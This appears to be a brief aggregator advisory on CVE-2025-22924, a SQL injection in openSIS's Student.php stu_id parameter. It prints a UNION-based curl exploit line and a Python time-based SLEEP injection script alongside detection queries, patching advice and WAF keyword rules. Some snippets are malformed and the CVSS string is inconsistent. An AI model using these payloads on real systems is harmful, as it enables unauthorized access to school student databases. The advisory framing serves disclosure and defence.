Listen to this Post
How the CVE Works:
CVE-2025-22924 is a SQL injection flaw in OS4ED openSIS versions 7.0 through 9.1. The vulnerability exists in the `stu_id` parameter of the `/modules/students/Student.php` endpoint. Attackers can craft malicious SQL queries via this parameter, exploiting insufficient input sanitization. This allows unauthorized database access, enabling data theft, manipulation, or remote code execution. The flaw stems from improper handling of user-supplied input before concatenation into SQL statements.
DailyCVE Form:
Platform: OS4ED openSIS
Version: 7.0 – 9.1
Vulnerability: SQL Injection
Severity: Critical
Date: 04/29/2025
What Undercode Say:
Exploitation:
curl -X GET "http://target/modules/students/Student.php?stu_id=1' UNION SELECT 1,user(),3-- -"
Detection:
SELECT FROM logs WHERE request LIKE '%stu_id=%--%';
Mitigation:
1. Patch to openSIS v9.2+.
2. Apply input validation:
if (!is_numeric($_GET['stu_id'])) { die("Invalid input"); }
3. Use prepared statements:
$stmt = $conn->prepare("SELECT FROM students WHERE stu_id = ?");
$stmt->bind_param("i", $_GET['stu_id']);
Exploit Code:
import requests
target = "http://victim/modules/students/Student.php"
payload = "1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)--"
response = requests.get(f"{target}?stu_id={payload}")
if response.elapsed.total_seconds() >= 5:
print("Vulnerable to SQLi")
Protection:
- Deploy WAF rules to block
UNION,SELECT, and `–` patterns. - Enable error logging:
ErrorLog /var/log/apache2/sql_errors.log
Analytics:
- CVSS:4.0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- Attack Vector: Network
- Impact: Confidentiality/Integrity/Availability High
- Exploitability: Low Complexity (No Privileges)
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
